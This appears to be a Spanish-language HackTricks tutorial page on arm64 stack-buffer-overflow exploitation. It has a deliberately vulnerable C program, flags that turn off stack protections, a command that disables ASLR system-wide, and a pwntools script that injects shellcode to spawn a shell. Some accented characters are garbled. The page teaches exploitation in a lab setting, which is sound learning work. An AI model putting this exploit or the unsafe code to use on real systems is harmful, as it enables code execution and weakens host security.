Stack Shellcode - arm64

Reading time: 2 minutes

tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Encuentra una introducci贸n a arm64 en:

Introduction to ARM64v8

Code

c
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Compilar sin pie, canario y nx:

bash
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

No ASLR & No canary - Stack Overflow

Para detener ASLR, ejecuta:

bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Para obtener el offset del bof revisa este enlace.

Explotar:

python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

La 煤nica cosa "complicada" de encontrar aqu铆 ser铆a la direcci贸n en la pila a la que llamar. En mi caso, gener茅 el exploit con la direcci贸n encontrada usando gdb, pero luego, al explotarlo, no funcion贸 (porque la direcci贸n de la pila cambi贸 un poco).

Abr铆 el archivo core generado (gdb ./bog ./core) y verifiqu茅 la direcci贸n real del inicio del shellcode.

tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks